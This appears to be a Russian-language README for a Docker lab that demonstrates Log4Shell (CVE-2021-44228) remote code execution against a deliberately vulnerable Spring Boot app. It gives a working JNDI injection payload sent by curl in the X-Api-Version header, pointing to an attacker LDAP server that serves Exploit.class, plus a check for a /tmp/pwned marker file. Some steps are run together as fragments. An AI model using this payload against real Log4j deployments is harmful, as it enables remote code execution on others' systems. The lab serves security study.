
Демонстрация эксплуатации RCE на основе Docker для Log4Shell (CVE-2021-44228) с уязвимым приложением Spring Boot, вредоносным LDAP-сервером и доставкой полезной нагрузки через JNDI-инъекцию.
Этот проект моделирует сценарий атаки RCE через уязвимость Log4Shell в библиотеке Apache Log4j 2.
Exploit.class.Требуется установка Docker и Docker Compose.
docker compose up --build
Дождитесь готовности обоих контейнеров. vulnerable-app будет запущен на порту 8080.
Откройте новый терминал и отправьте запрос с payload JNDI через заголовок X-Api-Version:
curl -H 'X-Api-Version: ${jndi:ldap://attacker:1389/Exploit}' http://localhost:8080/
vulnerable-app. Вы увидите сообщение о том, что payload был записан в лог.attacker. Вы увидите, что LDAP-соединение перенаправляется на HTTP-сервер./tmp/pwned внутри контейнера vulnerable-app:docker exec -it vulnerable-app ls -la /tmp/pwned
Если файл существует, это означает, что вредоносный код Exploit.class был успешно выполнен!
Этот проект предназначен только для образовательных целей и исследований в области безопасности. Категорически запрещается использовать его в незаконных целях.